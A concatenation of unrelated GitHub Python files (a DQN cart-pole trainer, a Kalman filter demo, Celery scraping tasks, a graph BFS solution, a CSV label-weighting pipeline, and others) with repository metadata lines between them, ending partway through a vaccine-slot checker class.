    selected = [np.uint8(images[i]) for i in image_indicies_to_concatenate]
    return np.concatenate(selected, axis=1)
| VanLifeInc/models | utils/image_similarity.py | image_similarity.py | py | 1,518 | python | en | code | 1 | github-code | 90 |
42271872866 | #!/usr/bin/env python
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data.dataset import Dataset
from torch.utils.data import DataLoader
from robot_sim.srv import RobotAction
from robot_sim.srv import RobotActionRequest
from robot_sim.srv import RobotActionResponse
from robot_sim.srv import RobotPolicy
from robot_sim.srv import RobotPolicyRequest
from robot_sim.srv import RobotPolicyResponse
import rospy
import numpy as np
import random
class ReplayMemory(object):
    """Fixed-capacity ring buffer of transitions for experience replay."""

    def __init__(self, capacity):
        self.capacity = capacity
        self.position = 0
        self.memory = []

    def store(self, state):
        """Append until full, then overwrite entries in circular order."""
        if len(self.memory) < self.capacity:
            self.memory.append(None)
        self.memory[self.position] = state
        self.position = (self.position + 1) % self.capacity

    def sample(self, batch_size):
        """Draw a uniform random batch without replacement."""
        return random.sample(self.memory, batch_size)

    def __len__(self):
        return len(self.memory)
class MyDNN(nn.Module):
    """Two-layer fully connected network mapping a state to two action values.

    Weights of both linear layers are initialized from N(0, 0.1). Note the
    output layer is also passed through ReLU, matching the original design.
    """

    def __init__(self, input_dim):
        super(MyDNN, self).__init__()
        self.fc1 = nn.Linear(input_dim, 32)
        self.fc1.weight.data.normal_(0, 0.1)
        self.fc2 = nn.Linear(32, 2)
        self.fc2.weight.data.normal_(0, 0.1)

    def forward(self, x):
        hidden = F.relu(self.fc1(x))
        return F.relu(self.fc2(hidden))

    def predict(self, features):
        """Run a forward pass in eval mode on a numpy array; return numpy."""
        self.eval()
        inputs = torch.from_numpy(features).float()
        return self.forward(inputs).detach().numpy()
class Env(object):
    """Thin wrapper around the 'cartpole_robot' ROS service.

    Encodes the cart-pole episode conventions: reset with a small random
    pole angle, step with a scalar force, and treat |angle| >= 6 deg or
    |cart position| >= 1.2 as a terminal state.
    """

    def __init__(self):
        self.cartpole_action_service = rospy.ServiceProxy('cartpole_robot', RobotAction)
        self.req = RobotActionRequest()
    def get_random_sign(self):
        # Fair coin: +1.0 or -1.0.
        return 1.0 if random.random() < 0.5 else -1.0
    def reset(self):
        """Reset the robot with a random pole angle in (0, 3] deg, either sign.

        Returns the initial robot state as a numpy array.
        """
        self.req.reset_robot = True
        self.req.reset_pole_angle = np.random.uniform(np.deg2rad(0), np.deg2rad(3))*self.get_random_sign()
        #print(req.reset_pole_angle)
        response = self.cartpole_action_service(self.req)
        response = response.robot_state
        response = np.array(response)
        # self.req.reset_robot = False
        return response
    def observation(self, action):
        """Apply a scalar force and return (reward, new_state).

        new_state is None (and reward 0) when the episode terminates:
        pole beyond 6 deg or cart beyond 1.2 -- assumed meters, TODO confirm.
        """
        self.req.reset_robot = False
        action = [action]
        self.req.action = action
        #print(self.req)
        response = self.cartpole_action_service(self.req)
        response = response.robot_state
        response = np.array(response)
        #print(response)
        if np.abs(response[1]) >= np.deg2rad(6) or np.abs(response[0]) >= 1.2:
            response = None
            reward = 0
        else:
            reward = 1
        return reward, response
    def action(self, output):
        """Map network output (two Q-values) to a force of -10 or +10."""
        #actions = np.linspace(-10, 10, num=21)
        actions = np.array([-10,10])
        n = np.argmax(output)
        action = actions[n]
        #k = np.array([21.13, -320.74, 30.23, -70.18])
        #action = np.dot(k, np.array(output))
        #print('-----')
        #print(action)
        #print(action)
        return action
class Train(object):
    """DQN trainer for the ROS cart-pole: trains in __init__, then serves
    the learned policy via the 'cartpole_policy' ROS service.

    NOTE(review): MyDNN.predict() detaches its output before converting to
    numpy, and train_nn() rebuilds tensors from those numpy values, so
    loss.backward() cannot propagate gradients into action_nn's parameters.
    Verify that training actually updates the network weights.
    """

    def __init__(self):
        self.episode_num = 200
        self.batch_size = 32
        T = 200  # max steps per episode
        # action_nn is (intended to be) trained; target_nn is a periodically
        # synced copy used for bootstrapped targets and final serving.
        self.action_nn = MyDNN(4)
        self.target_nn = MyDNN(4)
        self.target_nn.load_state_dict(self.action_nn.state_dict())
        self.target_nn.eval()
        self.optimizer = optim.RMSprop(self.action_nn.parameters())
        self.memory = ReplayMemory(10000)
        for i in range(self.episode_num):
            # NOTE(review): a fresh Env (and ServiceProxy) is created per
            # episode and per step below -- confirm this is intentional.
            init_state = Env().reset()
            episode_reward = 0
            state = init_state
            for t in range(T):
                action = self.select_action(i, state)
                #print(action)
                reward, new_state = Env().observation(action)
                D = [state, action, reward, new_state]
                self.memory.store(D)
                episode_reward += reward
                state = new_state
                #
                self.train_nn()
                if new_state is None:
                    break
            # Sync the target network every 20 episodes.
            if i % 20 == 0:
                self.target_nn.load_state_dict(self.action_nn.state_dict())
            print(episode_reward)
        print('ready')
        self.implement()
    def select_action(self, episode, state):
        """Epsilon-greedy action: epsilon decays linearly to 0.01.

        NOTE(review): under Python 2 integer division, episode /
        self.episode_num is 0 for all episodes, keeping eps at 1 (pure
        exploration) -- confirm the intended interpreter.
        """
        eps = max(1 - episode / self.episode_num, 0.01)
        #eps = 0.2
        sample = random.random()
        #actions = np.linspace(-10, 10, num=21)
        actions = np.array([-10,10])
        if sample > eps:
            output = self.action_nn.predict(state)
            n = np.argmax(output)
        else:
            n = random.randint(0,1)
        action = actions[n]
        #print(action)
        return action
    def train_nn(self):
        """One DQN update step on a sampled minibatch (no-op until the
        replay memory holds at least batch_size transitions)."""
        gamma = 0.999
        if len(self.memory) < self.batch_size:
            return
        mini_batch = self.memory.sample(self.batch_size)
        mini_batch = np.array(mini_batch)
        #print(mini_batch)
        # Columns of each transition: [state, action, reward, next_state].
        state_batch = mini_batch[:,0]
        action_batch = mini_batch[:,1]
        reward_batch = mini_batch[:,2]
        #print(reward_batch)
        next_state_batch = mini_batch[:,3]
        state_values = []
        # Terminal transitions (next_state is None) keep a 0 bootstrap value.
        next_state_value = np.zeros(self.batch_size)
        self.action_nn.train()
        for i in range(self.batch_size):
            if next_state_batch[i] is not None:
                next_state_values = self.target_nn.predict(next_state_batch[i])
                #print(next_state_values)
                next_state_value[i] = max(next_state_values)
            # Q-value of the action actually taken (-10 -> index 0, +10 -> 1).
            if action_batch[i] == -10:
                s = self.action_nn.predict(state_batch[i])[0]
            else:
                s = self.action_nn.predict(state_batch[i])[1]
            #print(self.action_nn.predict(state_batch[i]))
            state_values.append(s)
        state_values = np.array(state_values)
        state_value = state_values
        expected_state_value = (next_state_value * gamma) + np.array(reward_batch)
        #print(expected_state_value)
        #print(state_value)
        expected_state_value = expected_state_value.astype(np.double)
        state_value = state_value.astype(np.double)
        expected_state_value = expected_state_value.reshape(-1,1)
        #state_value = state_value.reshape(-1,1)
        # NOTE(review): both tensors are rebuilt from detached numpy arrays,
        # so this loss has no graph connection to action_nn (see class note).
        state_value = torch.tensor(state_value, requires_grad=True)
        expected_state_value = torch.tensor(expected_state_value, requires_grad=True)
        #print(expected_state_value)
        #print(state_value)
        self.optimizer.zero_grad()
        #print(state_value)
        loss = F.smooth_l1_loss(state_value, expected_state_value)
        print(loss)
        # optimize the model
        loss.backward()
        #for param in self.action_nn.parameters():
            #print(param.grad)
        #    if param.grad is not None:
        #        param.grad.data.clamp_(-1, 1)
        self.optimizer.step()
    def implement(self):
        """Expose the trained policy as the 'cartpole_policy' ROS service."""
        rospy.init_node('cartpole_policy', anonymous=True)
        policy_service = rospy.Service('cartpole_policy', RobotPolicy, self.callback)
        print('yes')
        rospy.spin()
    def callback(self, req):
        """Service callback: map the requested robot state to a force."""
        print('continue')
        #req = RobotPolicyRequest
        state = req.robot_state
        #print('---------')
        #print(state)
        #print('----------')
        state = np.array(state)
        output = self.target_nn.predict(state)
        #print('-----')
        #print(output)
        action = Env().action(output)
        action = [action]
        #print(response)
        return RobotPolicyResponse(action)
if __name__ == '__main__':
    # NOTE(review): Train.implement() calls rospy.init_node again; rospy
    # normally allows only one init per process -- confirm this does not raise.
    rospy.init_node('cartpole_policy', anonymous=True)
    t = Train()
    print('ok')
| Minglunt/RobotLearning | project3_ws/src/robot_sim/scripts/learn_dqn.py | learn_dqn.py | py | 7,973 | python | en | code | 1 | github-code | 90 |
10142830356 | import numpy as np
import matplotlib.pyplot as plt
def initPlot(N):
    """Create a single-axes figure spanning x in [0, N] and y in [0, 500]."""
    figure = plt.figure()
    axes = figure.add_subplot(1, 1, 1)
    axes.axis([0, N, 0, 500])
    return axes
class filterKalman(object):
    """Linear Kalman filter with control input (np.matrix throughout).

    Predict:  x = F x + G u,   P = F P F' + Q
    Update:   K = P H' (H P H' + R)^-1,  x = x + K (z - H x)
    """

    def __init__(self):
        # When True, use the simplified covariance update P = (I - K H) P,
        # valid only for the optimal gain; otherwise the Joseph form is used.
        self.optimal = False

    def setModelStateTransition(self, modelStateTransition):
        """State transition matrix F."""
        self.F = np.matrix(modelStateTransition)

    def setModelControlInput(self, modelControlInput):
        """Control input matrix G."""
        self.G = np.matrix(modelControlInput)

    def setParameterControlInput(self, parameterControlInput):
        """Control vector u."""
        self.u = np.matrix(parameterControlInput)

    def setNoiseProcess(self, noiseProcess):
        """Process noise covariance Q."""
        self.Q = np.matrix(noiseProcess)

    def setModelObservation(self, modelObservation):
        """Observation matrix H."""
        self.H = np.matrix(modelObservation)

    def setNoiseObservation(self, noiseObservation):
        """Observation noise covariance R."""
        self.R = np.matrix(noiseObservation)

    def setState(self, state, covariance=None):
        """Set initial state x and covariance P (zero matrix if omitted)."""
        self.x = np.matrix(state)
        N = len(self.x)
        if covariance is None:
            # Bug fix: the original called bare ``zeros`` (a NameError, since
            # only ``np`` is imported) and tested ``covariance == None``.
            self.P = np.matrix(np.zeros((N, N)))
        else:
            self.P = np.matrix(covariance)
        self.E = np.matrix(np.diag(np.ones(N)))

    def setOptimalKalmanGain(self, optimal):
        self.optimal = optimal

    def setObservation(self, observation):
        self.z = observation

    def __predict(self):
        self.x = self.F * self.x + self.G * self.u
        self.P = self.F * self.P * self.F.T + self.Q

    def __update(self):
        K = self.P * self.H.T * (self.H * self.P * self.H.T + self.R).I
        e = self.z - self.H * self.x
        self.x = self.x + K * e
        KH = self.E - K * self.H
        if self.optimal:
            self.P = KH * self.P
        else:
            # Joseph-form update: valid for any gain, numerically safer.
            self.P = KH * self.P * KH.T + K * self.R * K.T

    def advance(self, observation):
        """Run one predict/update cycle for the given measurement."""
        self.z = observation
        self.__predict()
        self.__update()

    def getState(self):
        return self.x
if __name__ == '__main__':
    # Demo: track a constantly accelerating object from noisy position
    # measurements and plot raw measurements vs. the filtered position.
    x0 = 0 # m
    v0 = 20 # m s-1
    a0 = 2 # m s-2
    sx = 1 # m s-1
    sxm = 20 # m s-1
    sv = 1 # m s-2
    sa = 0.1 # m s-1
    dt = 0.1 # s
    Nm = 100
    kalman = filterKalman()
    # Constant-acceleration kinematic model with acceleration as control u.
    kalman.setModelStateTransition([[1, dt], [0, 1]])
    kalman.setModelControlInput([[dt ** 2 / 2], [dt]])
    kalman.setParameterControlInput(a0)
    kalman.setNoiseProcess(sa ** 2 * np.array([[dt ** 4 / 4, dt ** 3 / 2], [dt ** 3 / 2, dt ** 2]]))
    kalman.setModelObservation([1, 0])
    kalman.setNoiseObservation([sxm ** 2])
    kalman.setState([[x0], [v0]], [[sx ** 2, 0], [0, sv ** 2]])
    # Synthetic measurements: exact trajectory plus Gaussian noise.
    ex = np.random.normal(0, sxm, Nm)
    z = np.array([x0 + v0 * (i + 1) * dt + a0 * ((i + 1) * dt) ** 2 / 2 + ex[i] for i in range(Nm)])
    ax = initPlot(Nm)
    xx = np.zeros((2, Nm))
    #kalman.setOptimalKalmanGain(True)
    for i in range(Nm):
        kalman.advance(z[i])
        xx[:, i] = kalman.getState().T
    ax.plot(z, 'ko')
    ax.plot(xx[0, :], 'r-', lw=2)
    plt.show()
| fgroes/statistics | kalman/main.py | main.py | py | 2,609 | python | en | code | 0 | github-code | 90 |
15772099290 | """Example module of celery tasks."""
import logging
import time
from annuaire.annuaire.database import populate_lawyers
from annuaire.annuaire.exception import AnnuaireException
from annuaire.annuaire.query import get_form_page, search
from annuaire.tasks import celery
log = logging.getLogger(__name__)
@celery.task(bind=True, track_started=True)
def add(self, x: int, y: int) -> int:
    """
    Compute the sum of two integers after a simulated 5 s delay.

    Bound celery task (``self`` is the task instance); ``track_started``
    makes the STARTED state visible while the sleep runs.

    :param self: the bound celery task instance
    :param x: first addend
    :param y: second addend
    :return: ``x + y``
    """
    time.sleep(5)
    return x + y
@celery.task(bind=True, track_started=True)
def scrap_one_barreau(self, barreau_code):
    """
    Scrape the lawyer directory for one barreau and persist the results.

    Fetches the search form page (for its cookies), runs the search for
    ``barreau_code`` and stores the items in the database.

    :param self: the bound celery task instance
    :param barreau_code: directory code of the barreau to scrape
    :return: None
    """
    result = get_form_page()
    try:
        items = search(barreau_code, result["cookies"])
        populate_lawyers(items)
    except AnnuaireException as e:
        # Scraper-level failure: log and retry up to 3 times, 60 s apart.
        log.warning(e.message)
        self.retry(max_retries=3, countdown=60)
| djacomy/lawer-annuaire | annuaire/tasks/add.py | add.py | py | 927 | python | en | code | 0 | github-code | 90 |
22357945435 | import argparse
import asyncio
import json
from marilyn_api.client import AsyncClient
async def main(
    api_root: str, headers: dict, project_id: int, params: dict = None, save_to_file: bool = False
):
    """Stream project placements and either print them or dump them to JSON.

    NOTE(review): ``save_to_file`` is annotated bool but is also used as the
    output file path in ``open(save_to_file, "w")`` -- callers pass either
    False or a path string; confirm and fix the annotation upstream.
    """
    aclient = AsyncClient(api_root, headers)
    data = []
    async for page in aclient.iter_project_placements(project_id, params=params, headers=headers):
        if save_to_file:
            # Accumulate all pages and write once at the end.
            data += page["items"]
        else:
            for item in page["items"]:
                print("RECORD:", item)
    if save_to_file:
        with open(save_to_file, "w") as f:
            json.dump(data, f)
if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="Downloading project placements to a JSON file"
    )
    parser.add_argument("-r", "--api-root", required=True, type=str, help="Api root. Example https://app.mymarilyn.ru")
    parser.add_argument("-a", "--account", required=True, type=str, help="Account ID")
    parser.add_argument("-t", "--token", required=True, type=str, help="Token for auth")
    parser.add_argument("-p", "--project", required=True, type=int, help="Project ID")
    parser.add_argument(
        "-c",
        "--params-config",
        required=False,
        default=None,
        type=str,
        help="The path to the JSON file of the GET params for the request",
    )
    parser.add_argument("-f", "--save-to-file", default=False, type=str, help="Save data to file")
    args = parser.parse_args()
    # Auth is carried in custom headers on every request.
    headers = {
        "X-API-Account": args.account,
        "X-API-Token": args.token,
    }
    # NOTE(review): args.params_config is a file *path* per its help text,
    # but it is passed straight into main's ``params`` (expected dict)
    # without being loaded/parsed -- confirm and load the JSON here.
    asyncio.run(main(args.api_root, headers, args.project, args.params_config, args.save_to_file))
| pavelmaksimov/marilyn-api | Examples/project_placements.py | project_placements.py | py | 1,675 | python | en | code | 0 | github-code | 90 |
31256817977 | from collections import deque
import copy
def bfs2(visited3,target):
    """BFS over the nodes NOT yet visited, accumulating their weight sum.

    Relies on module globals N, nums and graph. Returns [count, sum] once
    ``target`` nodes are covered, or the sentinel [100000, 1000000] when the
    remaining nodes cannot form a group of that size.

    NOTE(review): ``count`` is carried per queue entry but mutated inside
    the neighbor loop, and ``sum`` shadows the builtin -- this mirrors the
    original contest code; its correctness is suspect, verify before reuse.
    """
    que = deque()
    sum = 0
    for i in range(N+1):
        if not visited3[i] :
            que.append([i,1])
            visited3[i]=True
            sum += nums[i-1]
    while que :
        now ,count= que.popleft()
        if count == target :
            return [count,sum]
        for j in graph[now]:
            if not visited3[j] :
                count +=1
                sum += nums[j-1]
                que.append([j,count])
                visited3[j] = True
    return [100000,1000000]
def bfs(visit):
    """Try splitting the graph into two connected groups and return the
    minimum absolute difference of their weight sums, or -1 if impossible.

    For every candidate size ``target`` of the group containing node 1, a
    BFS grows that group; bfs2 then checks whether the complement is a
    single connected group of size N - target (BOJ 17471-style problem).

    NOTE(review): contest code with a leftover debug print (the i == 5
    branch) and heavy deepcopy of the visited list per queue entry;
    behavior is preserved as-is, verify before reuse.
    """
    result = []
    for i in range(1,N):
        target = i
        visited=copy.deepcopy(visit)
        que = deque()
        que.append([1,1,0,visited])
        visited[1]=True
        while que :
            now , count ,sum,visited= que.popleft()
            sum+=nums[now-1]
            if count == target :
                visited2=copy.deepcopy(visited)
                count2,sum2 = bfs2(visited2,N-count)
                # if i == 5 :
                #     # print(count,count2,sum,sum2,visited,visited2)
                if count + count2 == N :
                    #print(count,count2,sum,sum2,visited,visited2)
                    result.append(abs(sum-sum2))
            if count >target :
                break
            for j in graph[now]:
                if not visited[j] :
                    if i == 5 :
                        print(now,j,visited,count)
                    temp=copy.deepcopy(visited)
                    temp[j]=True
                    count +=1
                    que.append([j,count,sum,temp])
    if not result :
        return -1
    else :
        return min(result)
# Input format (BOJ 17471): node count N, then N node weights, then for each
# node a line "degree neighbor1 neighbor2 ...". Nodes are 1-indexed, so
# graph[0] stays an empty placeholder and visit[0] is pre-marked visited.
N =int(input())
nums=(list(map(int,input().split())))
graph=[[]]
visit = [False for _ in range(N+1)]
visit[0]=True
for i in range(1,N+1):
    temp=list(map(int,input().split()))
    graph.append(temp[1:])
print(bfs(visit))
| sungwoo-me/Algorithm | 백준/SK_연습/그래프탐색/17471.py | 17471.py | py | 2,058 | python | en | code | 0 | github-code | 90 |
10225434876 | # -*- coding: utf-8 -*-
"""
Created on Mon Jul 8 10:31:26 2019
@author: eileenlu
"""
import os
import sys
import numpy as np
import pandas as pd
from sklearn.metrics import f1_score
from sklearn.metrics import classification_report
from bert_sklearn import BertTokenClassifier, load_model
def flatten(l):
    """Concatenate a list of lists into a single flat list."""
    flat = []
    for sub in l:
        flat.extend(sub)
    return flat
def read_CoNLL2003_format(filename, idx=3):
    """Read a file in CoNLL-2003 shared task format into a DataFrame.

    Sentences are separated by blank lines; each token line holds
    whitespace-separated columns, with the token in column 0 and the
    label taken from column ``idx``.

    :param filename: path to the CoNLL-formatted file (UTF-8)
    :param idx: column index to use as the label (default 3, NER tags)
    :return: DataFrame with 'tokens' and 'labels' list columns per sentence
    """
    # Bug fix: the original opened the file without ever closing it; a
    # context manager releases the handle deterministically.
    with open(filename, encoding='utf-8') as f:
        lines = f.read().strip()
    # find sentence-like boundaries
    lines = lines.split("\n\n")
    # split on newlines
    lines = [line.split("\n") for line in lines]
    # get tokens
    tokens = [[l.split()[0] for l in line] for line in lines]
    # get labels/tags
    labels = [[l.split()[idx] for l in line] for line in lines]
    # convert to df
    data = {'tokens': tokens, 'labels': labels}
    df = pd.DataFrame(data=data)
    return df
def get_data(file_path):
    """Load a CoNLL file using column 1 as labels and report its size."""
    df = read_CoNLL2003_format(file_path, 1)
    n_sentences = len(df)
    n_tokens = len(flatten(df.tokens))
    print("Test data: %d sentences, %d tokens"%(n_sentences, n_tokens))
    return df
if __name__=='__main__':
    # Fine-tune a Chinese BERT token classifier on CoNLL-style NER data
    # located next to this script, then evaluate on dev and test splits.
    os.environ["CUDA_VISIBLE_DEVICES"] = "0,1,2,3"
    cur=os.path.dirname(os.path.abspath(__file__))
    train_path=os.path.join(cur,'data/train.txt')
    dev_path=os.path.join(cur,'data/dev.txt')
    test_path=os.path.join(cur,'data/test.txt')
    train, dev, test = get_data(train_path),get_data(dev_path),get_data(test_path)
    X_train, y_train = train['tokens'], train['labels']
    X_dev, y_dev = dev['tokens'], dev['labels']
    X_test, y_test = test['tokens'], test['labels']
    # Distinct label set observed in the training data.
    label_list = np.unique(flatten(y_train))
    label_list = list(label_list)
    # 'O' is excluded from the f1 computation via ignore_label.
    model = BertTokenClassifier(bert_model='bert-base-chinese',
                            epochs=20,
                            learning_rate=2e-5,
                            train_batch_size=16,
                            eval_batch_size=16,
                            ignore_label=['O'])
    print("Bert wordpiece tokenizer max token length in train: %d tokens"% model.get_max_token_len(X_train))
    print("Bert wordpiece tokenizer max token length in dev: %d tokens"% model.get_max_token_len(X_dev))
    print("Bert wordpiece tokenizer max token length in test: %d tokens"% model.get_max_token_len(X_test))
    model.max_seq_length = 512
    print(model)
    # finetune model on train data
    model.fit(X_train, y_train)
    model.save(os.path.join(cur,r'checkpoint/bert_sklearn07311.h5'))
    f1_dev = model.score(X_dev, y_dev)
    print("Dev f1: %0.02f"%(f1_dev))
    # score model on test data
    f1_test = model.score(X_test, y_test)
    print("Test f1: %0.02f"%(f1_test))
| MenglinLu/Chinese-clinical-NER | bert_sklearn_bioes/train_bert_sklearn.py | train_bert_sklearn.py | py | 2,809 | python | en | code | 331 | github-code | 90 |
def checkIfListsAreEqual(list1, list2):
    """Return True when every element of list1 also appears in list2.

    Note: despite the name this is a one-way containment check (list1 is a
    subset of list2), matching the original exercise semantics.
    """
    # Bug fix: the original line was corrupted by dataset-metadata residue
    # ("9485039200 | ") fused onto the def line, making the file unparseable.
    for i in list1:
        if i not in list2:
            return False
    return True
def checkIfListsAreEqual2(list1, list2):
    """Flag-based variant: True when list1 is contained in list2."""
    all_contained = all(element in list2 for element in list1)
    return all_contained
# Quick manual checks of the containment helper (expected: False, True).
print(checkIfListsAreEqual([1, 2], [1, 3])) # False
print(checkIfListsAreEqual([5, 6], [5, 6])) # True
| kelvin-homann/refugeeks | python_1/probeklausur/aufgabe_5.py | aufgabe_5.py | py | 411 | python | en | code | 2 | github-code | 90 |
32300099357 | import json
import tensorflow as tf
import numpy as np
from optparse import OptionParser
from tensorflow.python.lib.io.file_io import FileIO
from utils import SamplesIterator
from trainer import SupervisedTrainer
# Command-line configuration: data location, model output dir (--job-dir is
# the Google Cloud ML Engine convention) and a run name for checkpoints.
parser = OptionParser()
parser.add_option('--data-dir', dest='data_dir')
parser.add_option('--job-dir', dest='models_dir')
parser.add_option('--run-name', dest='run_name')
options, _ = parser.parse_args()
print('Data dir:', options.data_dir)
print('Models dir:', options.models_dir)
print('Run name:', options.run_name)
def load_data(name):
    """Load a JSON artifact from the configured data dir.

    Uses TensorFlow's FileIO so the path may be local or a GCS URI.
    """
    fullpath = '{0}/{1}'.format(options.data_dir, name)
    print('Load:', fullpath)
    return json.load(FileIO(fullpath, 'r'))
# Training artifacts loaded at import time: word embeddings, the slot and
# action vocabularies, and the pre-embedded train/test dialogue frames.
embeddings = np.asarray(load_data('embeddings.json'))
slots_dict = load_data('slots_dictionary.json')
actions_dict = load_data('actions_dictionary.json')
samples_train = load_data('embedded_frames_train.json')
samples_test = load_data('embedded_frames_test.json')
def train(n_epochs, batch_size=64):
    """Supervised training loop: one checkpoint and one test pass per epoch.

    :param n_epochs: number of epochs to run
    :param batch_size: minibatch size for both train and test iterators
    """
    train_samples_iterator = SamplesIterator(samples_train, batch_size=batch_size)
    test_samples_iterator = SamplesIterator(samples_test, batch_size=batch_size)
    trainer = SupervisedTrainer(
        n_slots=len(slots_dict),
        n_actions=len(actions_dict),
        word_embeddings_shape=embeddings.shape,
        save_path='{0}/ac_agent_{1}'.format(options.models_dir, options.run_name),
        batch_size=batch_size
    )
    # NOTE(review): reaches into the trainer's private session to run the
    # TF1 global initializer before seeding the embedding matrix.
    trainer._sess.run(tf.global_variables_initializer())
    trainer.initialize_word_embeddings(embeddings)
    for e in range(n_epochs):
        print('Epoch:', e)
        trainer.reset()
        for i, batch in enumerate(train_samples_iterator.batches()):
            trainer.train_batch(e, i, batch)
        trainer.save_checkpoint(e)
        trainer.reset()
        for i, batch in enumerate(test_samples_iterator.batches()):
            trainer.test_batch(e, i, batch)
if __name__ == '__main__':
    # Default training configuration when run as a script.
    train(
        n_epochs = 20,
        batch_size = 64
    )
| marekgalovic/jamesbot | jamesbot/agent/train.py | train.py | py | 2,000 | python | en | code | 1 | github-code | 90 |
25855276303 | import logging
def add():
    """Emit an info-level marker record and report success."""
    outcome = "ok"
    logging.info("OKA")
    return outcome
def main():
    """Configure file logging, then emit one record per severity level."""
    fmt = "%(asctime)s: %(levelname)s: %(funcName)s Line: %(lineno)d %(message)s"
    logging.basicConfig(level=logging.DEBUG, filename="output.log", format=fmt)
    logging.debug("DEBUG")
    logging.info("INFO")
    logging.warning("WARNING")
    logging.error("ERROR")
    logging.critical("CRITICAL")
    add()
if __name__ == "__main__":
    # Bug fix: dataset-metadata residue fused onto this line made the file
    # unparseable; restored to a plain script entry point.
    main()
30071980500 | from django.test.testcases import TestCase
from log.log_content.log_generator import LogConfig, AdditionalInfoBeforeDelete
class LogGenerator:
    # Stand-in generator class used as the registration target in the tests.
    pass
class TestLogConfig(TestCase):
    """Tests for the LogConfig registry used by the logging subsystem."""

    # URL name under which generators are registered throughout the tests.
    test_url_name = 'test-register'
    def test_create_log_config(self):
        """LogConfig behaves as a singleton: repeated calls share one object."""
        log1 = LogConfig()
        log2 = LogConfig()
        assert id(log1) == id(log2)
    def test_register_config(self):
        """Registering normalizes methods to uppercase and accepts a list."""
        log = LogConfig()
        log.register(self.test_url_name, 'get')(LogGenerator)
        test_config = log.get_config()
        assert test_config[self.test_url_name]['GET'] == LogGenerator
        log.register(self.test_url_name, ['GET', 'POST'])(LogGenerator)
        assert len(test_config[self.test_url_name]) == 2
        assert test_config[self.test_url_name]['GET'] == LogGenerator
        assert test_config[self.test_url_name]['POST'] == LogGenerator
    def test_register_additional_info(self):
        """additional_info=True also records the generator with the
        AdditionalInfoBeforeDelete registry (shared singleton config)."""
        log = LogConfig()
        addition = AdditionalInfoBeforeDelete()
        log.register(self.test_url_name, 'POST', additional_info=True)(
            LogGenerator)
        assert addition._config[self.test_url_name]['POST'] == LogGenerator
| liushiwen555/unified_management_platform_backend | log/tests/test_log_generator/test_log_config.py | test_log_config.py | py | 1,196 | python | en | code | 0 | github-code | 90 |
8673455441 | import os
import pandas as pd
import pickle
def read_scv_content(csv_path):
    """Read one CSV and return a list of single-entry {label: 1/count} dicts.

    For each row, the second column is taken as the label and the third
    column as a count whose reciprocal becomes that row's label weight.

    :param csv_path: path to a CSV file with a header row
    :return: list of one-key dicts, one per data row, in file order
    """
    df = pd.read_csv(csv_path)
    label_value_pairs = []
    for _, row in df.iterrows():
        # Bug fix: positional access via ``row[1]`` on a string-labelled
        # Series is deprecated (removed in newer pandas); use .iloc.
        key = row.iloc[1]
        value = 1.0 / row.iloc[2]
        label_value_pairs.append({key: value})
    return label_value_pairs
# def label_weight_Set(key_value_pairs)
def set_lable_value(label_value_pairs, n, m):
    """Merge per-entity label weights and normalise by entity count.

    Sums every label's weight across all entities, then rescales each total
    as total**n / count**m, where count is the number of entities.

    :param label_value_pairs: list of {label: weight} dicts, one per entity
    :param n: exponent applied to each summed label weight
    :param m: exponent applied to the entity count in the denominator
    :return: dict mapping each label to its final weight
    """
    count = len(label_value_pairs)
    totals = {}
    for pair in label_value_pairs:
        for label, weight in pair.items():
            totals[label] = totals.get(label, 0) + weight
    return {
        label: (total ** int(n)) / (count ** int(m))
        for label, total in totals.items()
    }
def offine_processing(folder_path, m, n):
    """Compute a label-weight dict for every CSV table in folder_path.

    :param folder_path: directory holding the per-table CSV files
    :param m: first exponent forwarded to set_lable_value
    :param n: second exponent forwarded to set_lable_value
    :return: (label_weight_set, files) -- per-table weight dicts and the
        matching CSV file names, in directory-listing order
    """
    label_weight_set = []
    files = []
    for filename in os.listdir(folder_path):
        file_path = os.path.join(folder_path, filename)
        if not file_path.endswith('.csv'):
            continue
        files.append(filename)
        pairs = read_scv_content(file_path)
        label_weight_set.append(set_lable_value(pairs, m, n))
    return label_weight_set, files
def read_folder_attributes(folder_path, fnames):
    """Collect the header row of each named CSV file under folder_path.

    :param folder_path: directory holding the CSV files
    :param fnames: file names to read; non-.csv names are skipped
    :return: list of header-name lists, one per CSV file, in fnames order
    """
    attributes = []
    for filename in fnames:
        if not filename.endswith('.csv'):
            continue
        df = pd.read_csv(os.path.join(folder_path, filename))
        attributes.append(df.columns.tolist())
    return attributes
def can_unique_label(can_label_folder_path, fnames):
    """Collect the distinct values of the second column of each CSV.

    Each distinct-value list is printed as it is produced (diagnostic
    output preserved from the original pipeline).

    Returns
    -------
    list[list]
        One de-duplicated value list per CSV file, in ``fnames`` order.
        Element order within each list is unspecified (set-derived).
    """
    unique_labels = []
    for fname in fnames:
        if not fname.endswith('.csv'):
            continue
        frame = pd.read_csv(os.path.join(can_label_folder_path, fname))
        # Second column (labels), de-duplicated via a set round-trip.
        distinct = list(set(frame.iloc[:, 1].tolist()))
        print(distinct)
        unique_labels.append(distinct)
    return unique_labels
# --- Offline pipeline driver -------------------------------------------
# p1: folder of per-table label CSVs (read twice: weights + uniques);
# p2: folder of the raw candidate tables (read for their headers).
p1 = r'freebaseResult'
p2 = r'freebase'
# p1 = r'test_free_result'
# p2 = r'test_free'
# Weight exponents are both 2 here (see set_lable_value for the formula).
label_weight_set, files = offine_processing(p1, 2, 2)
attributes = read_folder_attributes(p2, files)
unique_label = can_unique_label(p1, files)
# Sanity check: the three result lists should be the same length.
print(len(label_weight_set))
print(len(attributes))
print(len(unique_label))
# Persist intermediate results for the online matching phase.
with open(file = 'label.pkl',mode = 'wb') as f:
    pickle.dump(label_weight_set, f)
with open(file = 'file_names.pkl',mode = 'wb') as f:
    pickle.dump(files, f)
with open(file='candidate_attributes_list.pkl', mode='wb') as f:
    pickle.dump(attributes, f)
with open(file='unique_label.pkl',mode='wb') as f:
pickle.dump(unique_label, f) | anqing1953561931/Finding_related_table | offline_processing.py | offline_processing.py | py | 4,186 | python | en | code | 0 | github-code | 90 |
70188445097 | import requests
import time
from bs4 import BeautifulSoup
import smtplib
import tkinter as tk
import tkinter.messagebox as tkm
class Processor():
    """Polls the public Co-WIN API for vaccination slots at a pin code.

    Construction immediately starts polling (``tracker``); when a slot
    matching the requested age band is found, an e-mail alert is sent
    to the address supplied at construction time.
    """
    def __init__(self, p, d, m, age):
        # p: pin code, d: date string (DD-MM-YYYY), m: recipient e-mail,
